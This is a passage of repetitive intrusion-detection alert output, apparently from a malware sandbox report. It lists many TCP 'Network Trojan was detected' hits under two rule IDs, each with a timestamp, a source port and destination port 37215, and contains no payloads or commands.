                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264807
                SID:2829579
                Source Port:38444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.834598
                SID:2835222
                Source Port:53944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886327
                SID:2829579
                Source Port:49764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361504
                SID:2829579
                Source Port:46722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652286
                SID:2835222
                Source Port:38662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.164967
                SID:2829579
                Source Port:48768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899102
                SID:2835222
                Source Port:42994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900285
                SID:2829579
                Source Port:49868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336304
                SID:2829579
                Source Port:45730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883980
                SID:2835222
                Source Port:41226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914573
                SID:2829579
                Source Port:53028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560134
                SID:2835222
                Source Port:52920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.935636
                SID:2835222
                Source Port:42332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.668767
                SID:2835222
                Source Port:40202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.521663
                SID:2829579
                Source Port:56522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767070
                SID:2835222
                Source Port:43802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.959743
                SID:2835222
                Source Port:33612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212049
                SID:2829579
                Source Port:34536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586605
                SID:2829579
                Source Port:58942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.818013
                SID:2835222
                Source Port:45140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.168676
                SID:2835222
                Source Port:44234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014554
                SID:2835222
                Source Port:46192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088269
                SID:2835222
                Source Port:38374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716983
                SID:2835222
                Source Port:50606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583915
                SID:2835222
                Source Port:34952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.928957
                SID:2835222
                Source Port:47078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287101
                SID:2835222
                Source Port:60054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784584
                SID:2835222
                Source Port:53546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.860734
                SID:2835222
                Source Port:55452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.134066
                SID:2835222
                Source Port:43722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436448
                SID:2829579
                Source Port:47002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010528
                SID:2835222
                Source Port:48758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816908
                SID:2835222
                Source Port:50820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161625
                SID:2835222
                Source Port:58242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.278229
                SID:2835222
                Source Port:39690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472016
                SID:2835222
                Source Port:41322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986805
                SID:2829579
                Source Port:39248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.035558
                SID:2829579
                Source Port:59112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463922
                SID:2835222
                Source Port:58516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841773
                SID:2829579
                Source Port:33142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.391728
                SID:2835222
                Source Port:60874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968420
                SID:2829579
                Source Port:44358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.575027
                SID:2835222
                Source Port:43440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.528515
                SID:2829579
                Source Port:60526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.233550
                SID:2835222
                Source Port:42232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964241
                SID:2829579
                Source Port:44370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.233638
                SID:2835222
                Source Port:59948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666310
                SID:2835222
                Source Port:53190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532832
                SID:2829579
                Source Port:58504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008638
                SID:2829579
                Source Port:60650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212886
                SID:2829579
                Source Port:34012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933243
                SID:2829579
                Source Port:51060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.028067
                SID:2835222
                Source Port:54752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039368
                SID:2835222
                Source Port:53172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814793
                SID:2829579
                Source Port:50794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842192
                SID:2829579
                Source Port:56680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076145
                SID:2829579
                Source Port:56534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359185
                SID:2829579
                Source Port:56756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136116
                SID:2829579
                Source Port:48428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325578
                SID:2835222
                Source Port:36276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897189
                SID:2829579
                Source Port:34494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335362
                SID:2835222
                Source Port:37754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.063368
                SID:2835222
                Source Port:57680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900506
                SID:2835222
                Source Port:58686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933098
                SID:2829579
                Source Port:40992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728977
                SID:2835222
                Source Port:45718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318064
                SID:2835222
                Source Port:42606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.551932
                SID:2829579
                Source Port:50134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848795
                SID:2829579
                Source Port:49002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687156
                SID:2835222
                Source Port:41190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.038140
                SID:2829579
                Source Port:45718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.708505
                SID:2829579
                Source Port:33684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.417900
                SID:2829579
                Source Port:54282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981002
                SID:2835222
                Source Port:34566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.960835
                SID:2829579
                Source Port:35366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667403
                SID:2835222
                Source Port:57576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319426
                SID:2829579
                Source Port:46092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.028846
                SID:2835222
                Source Port:50818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666934
                SID:2835222
                Source Port:55614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369878
                SID:2829579
                Source Port:55878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209435
                SID:2829579
                Source Port:36536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824019
                SID:2835222
                Source Port:53366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784634
                SID:2835222
                Source Port:59050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885948
                SID:2835222
                Source Port:34674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857209
                SID:2829579
                Source Port:53032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287130
                SID:2829579
                Source Port:56642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562079
                SID:2829579
                Source Port:35378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.471029
                SID:2829579
                Source Port:60542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422080
                SID:2835222
                Source Port:51108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182870
                SID:2835222
                Source Port:51940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.444387
                SID:2829579
                Source Port:51300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462977
                SID:2835222
                Source Port:38954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665332
                SID:2829579
                Source Port:53258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287286
                SID:2835222
                Source Port:48410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140349
                SID:2835222
                Source Port:54172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025206
                SID:2835222
                Source Port:53838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025055
                SID:2829579
                Source Port:59150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287697
                SID:2829579
                Source Port:34936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.282548
                SID:2835222
                Source Port:44252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325103
                SID:2835222
                Source Port:47742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901191
                SID:2829579
                Source Port:41216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510164
                SID:2829579
                Source Port:39534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.513175
                SID:2829579
                Source Port:59862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.137073
                SID:2829579
                Source Port:54264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231385
                SID:2835222
                Source Port:42652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.271582
                SID:2835222
                Source Port:59870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.859944
                SID:2835222
                Source Port:41852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.392576
                SID:2829579
                Source Port:51914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432494
                SID:2829579
                Source Port:60218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856896
                SID:2829579
                Source Port:37274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520592
                SID:2835222
                Source Port:52478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025363
                SID:2829579
                Source Port:54686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.655677
                SID:2829579
                Source Port:35046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088406
                SID:2829579
                Source Port:39076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.110737
                SID:2835222
                Source Port:58620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945165
                SID:2835222
                Source Port:41006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.889919
                SID:2829579
                Source Port:53446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.468474
                SID:2835222
                Source Port:51014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667089
                SID:2829579
                Source Port:55154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.417683
                SID:2829579
                Source Port:51694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873239
                SID:2829579
                Source Port:34670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.895937
                SID:2835222
                Source Port:58184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763800
                SID:2829579
                Source Port:56596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997231
                SID:2829579
                Source Port:35070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.514347
                SID:2829579
                Source Port:35980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785566
                SID:2835222
                Source Port:54226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966405
                SID:2835222
                Source Port:49492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263822
                SID:2829579
                Source Port:55832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072749
                SID:2835222
                Source Port:54300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.785518
                SID:2835222
                Source Port:46356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277519
                SID:2829579
                Source Port:60370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.972696
                SID:2829579
                Source Port:44768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362616
                SID:2835222
                Source Port:49014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505703
                SID:2835222
                Source Port:59904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180520
                SID:2835222
                Source Port:34736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224224
                SID:2829579
                Source Port:48640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.874545
                SID:2829579
                Source Port:34750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075322
                SID:2835222
                Source Port:41548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.688730
                SID:2829579
                Source Port:59204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140958
                SID:2829579
                Source Port:39516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.396685
                SID:2835222
                Source Port:33166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.736538
                SID:2835222
                Source Port:39400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945200
                SID:2829579
                Source Port:36404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166916
                SID:2835222
                Source Port:56722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521015
                SID:2829579
                Source Port:51740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.336064
                SID:2835222
                Source Port:32956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931652
                SID:2829579
                Source Port:55376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001902
                SID:2829579
                Source Port:43568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557004
                SID:2835222
                Source Port:38906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868507
                SID:2835222
                Source Port:35074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281642
                SID:2835222
                Source Port:56430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681730
                SID:2835222
                Source Port:47702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071695
                SID:2835222
                Source Port:58786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262380
                SID:2829579
                Source Port:39434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.572603
                SID:2835222
                Source Port:47292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.584900
                SID:2835222
                Source Port:56432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.275885
                SID:2835222
                Source Port:49854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210761
                SID:2835222
                Source Port:50222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.139908
                SID:2829579
                Source Port:48356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.810464
                SID:2835222
                Source Port:37830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.019179
                SID:2829579
                Source Port:35564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780604
                SID:2829579
                Source Port:37790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881678
                SID:2829579
                Source Port:46672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.935803
                SID:2835222
                Source Port:49310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616035
                SID:2829579
                Source Port:60504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032870
                SID:2835222
                Source Port:49252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982014
                SID:2829579
                Source Port:38002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.083631
                SID:2835222
                Source Port:56258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363259
                SID:2829579
                Source Port:52312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231966
                SID:2829579
                Source Port:36572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169155
                SID:2835222
                Source Port:58666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212866
                SID:2829579
                Source Port:46016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.217877
                SID:2835222
                Source Port:55222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811574
                SID:2835222
                Source Port:45952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284985
                SID:2829579
                Source Port:48908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440796
                SID:2835222
                Source Port:38322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287187
                SID:2835222
                Source Port:58342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684427
                SID:2835222
                Source Port:53802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660872
                SID:2835222
                Source Port:36228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.845573
                SID:2829579
                Source Port:53262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.656028
                SID:2835222
                Source Port:52088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.239405
                SID:2829579
                Source Port:55890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612840
                SID:2835222
                Source Port:43832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665656
                SID:2835222
                Source Port:56712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928593
                SID:2835222
                Source Port:50358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.156073
                SID:2835222
                Source Port:49846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180167
                SID:2829579
                Source Port:40644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897384
                SID:2829579
                Source Port:59024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586766
                SID:2829579
                Source Port:34904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868267
                SID:2835222
                Source Port:45212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.974242
                SID:2829579
                Source Port:35482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.119377
                SID:2829579
                Source Port:37244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.236254
                SID:2835222
                Source Port:37674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001757
                SID:2829579
                Source Port:34922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.537135
                SID:2835222
                Source Port:58988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113443
                SID:2829579
                Source Port:49236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177238
                SID:2829579
                Source Port:55310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
